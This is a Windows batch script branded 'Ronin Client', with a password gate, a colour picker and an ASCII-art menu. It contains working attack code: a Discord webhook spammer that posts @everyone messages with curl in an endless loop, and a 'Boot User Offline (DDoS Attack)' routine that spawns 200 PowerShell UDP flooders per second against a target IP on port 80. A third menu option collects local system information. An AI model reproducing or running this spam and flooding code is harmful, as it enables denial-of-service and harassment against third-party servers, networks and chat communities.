@echo off
setlocal enabledelayedexpansion

:color_changing_text
cls
echo.
echo  A VPN IS RECOMMENDED FOR THIS CLIENT
echo.
timeout /t 5 >nul

:color_picker
cls
echo Pick a color:
echo.
echo 1. Red
echo 2. Green
echo 3. Blue
echo 4. Purple
echo 5. Orange
echo 6. Yellow
echo.
set /p color_choice=Enter the number corresponding to your color choice:

if "%color_choice%"=="1" set color_code=0C
if "%color_choice%"=="2" set color_code=0A
if "%color_choice%"=="3" set color_code=0B
if "%color_choice%"=="4" set color_code=0D
if "%color_choice%"=="5" set color_code=0E
if "%color_choice%"=="6" set color_code=0F

if defined color_code (color %color_code%) else (echo Invalid choice. Exiting. & pause & exit)

:set_password
cls
set "keyfile=%TEMP%\AASLF@!QWE.KEY"
if exist "%keyfile%" goto main_menu

set /p password=Enter Password:
if "%password%"=="RoninOnTopXOXO" (
    echo. > "%keyfile%"
    goto main_menu
)
echo Invalid password. Exiting.
pause
exit

:main_menu
cls
echo                                          .                                     ..    .                                  s    
echo                                         @88>                             x .d88"    @88>                               :8    
echo   .u    .          u.      u.    u.     %8P      u.    u.                 5888R     %8P                 u.    u.      .88    
echo .d88B :@8c   ...ue888b   x@88k u@88c.    .     x@88k u@88c.          .    '888R      .         .u     x@88k u@88c.   :888ooo 
echo ="8888f8888r  888R Y888r ^"8888""8888"  .@88u  ^"8888""8888"     .udR88N    888R    .@88u    ud8888.  ^"8888""8888" -*8888888 
echo   4888>'88"   888R I888>   8888  888R  ''888E`   8888  888R     <888'888k   888R   ''888E` :888'8888.   8888  888R    8888    
echo   4888> '     888R I888>   8888  888R    888E    8888  888R     9888 'Y"    888R     888E  d888 '88%"   8888  888R    8888    
echo   4888>       888R I888>   8888  888R    888E    8888  888R     9888        888R     888E  8888.+"      8888  888R    8888    
echo  .d888L .+   u8888cJ888    8888  888R    888E    8888  888R     9888        888R     888E  8888L        8888  888R   .8888Lu= 
echo  ^"8888*"     "*888*P"    "*88*" 8888"   888&   "*88*" 8888"    ?8888u../  .888B .   888&  '8888c. .+  "*88*" 8888"  ^%888*   
echo     "Y"         'Y"         ""   'Y"     R888"    ""   'Y"       "8888P'   ^*888%    R888"  "88888%      ""   'Y"      'Y"    
echo                                          ""                       "P'       "%       ""      "YP'                            
echo           |                                                                                                                              
echo           |                                                                                                         
echo           |
echo           |---discord(1)
echo           | 
echo           |------windows exploits(2) 
echo           | 
echo           | 
echo           |--------(paid)(3) 
echo           | 
echo           | 
echo           | 
echo           \
echo            \
echo             \
set /p main_choice=                 ---------------------->

if "%main_choice%"=="1" goto discord_menu
if "%main_choice%"=="2" goto windows_exploits
if "%main_choice%"=="3" goto system_info
if "%main_choice%"=="4" goto random_tests
if "%main_choice%"=="5" goto exit
echo Invalid option. Please choose a valid option.
pause
goto main_menu

:discord_menu
cls
echo RONIN CLIENT ON TOP(MADE BY THATGUIYRONIN)
echo.
echo 1. Discord Webhook Spammer
echo 2. Back to Main Menu
echo.
set /p discord_choice=Choose an option:

if "%discord_choice%"=="1" goto spammer
if "%discord_choice%"=="2" goto main_menu
echo Invalid option. Please choose a valid option.
pause
goto discord_menu

:spammer
cls
set /p webhook_url=Enter Discord Webhook URL:
set "jsonData={\"content\":\"@everyone RONIN CLIENT ON TOP\"}"

:spam
curl -X POST -H "Content-Type: application/json" -d "%jsonData%" "%webhook_url%"
curl -X POST -H "Content-Type: application/json" -d "%jsonData%" "%webhook_url%"
curl -X POST -H "Content-Type: application/json" -d "%jsonData%" "%webhook_url%"
curl -X POST -H "Content-Type: application/json" -d "%jsonData%" "%webhook_url%"
timeout /t 0 >nul
goto spam

:windows_exploits
cls
echo RONIN CLIENT ON TOP(MADE BY THATGUIYRONIN)
echo.
echo 1. Boot User Offline (DDoS Attack)
echo 2. Back to Main Menu
echo.
set /p windows_exploit_choice=Choose an option:

if "%windows_exploit_choice%"=="1" goto ddos_attack
if "%windows_exploit_choice%"=="2" goto main_menu
echo Invalid option. Please choose a valid option.
pause
goto windows_exploits

:ddos_attack
cls
set /p target_ip=Enter the target IP address:
set /a port=80

:spam_target
for /L %%i in (1,1,200) do (
    start /b powershell -Command "New-Object System.Net.Sockets.UdpClient; $client = New-Object System.Net.Sockets.UdpClient; $client.Connect('%target_ip%', %port%); $client.Send([System.Text.Encoding]::ASCII.GetBytes('A' * 1024)); $client.Close();"
)
timeout /t 1 >nul
goto spam_target

:system_info
cls
echo Gathering detailed system information...
echo.

:: Use systeminfo to get detailed system information
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Processor(s)" /C:"BIOS Version" /C:"Total Physical Memory" /C:"Available Physical Memory" /C:"Virtual Memory" /C:"Page File" /C:"Page File Space" /C:"Domain" /C:"Logon Server" /C:"Hotfix(s)" /C:"Network Card(s)" /C:"Hyper-V Requirements" > system_info.txt

:: Display the gathered information
for /f "tokens=*" %%a in (system_info.txt) do (
    echo %%a
)

:: Clean up
del system_info.txt

echo.
pause
goto main_menu

:random_tests
cls
echo Random Tests functionality coming soon!
pause
goto main_menu

:exit
echo Exiting RONIN CLIENT.
pause
exit
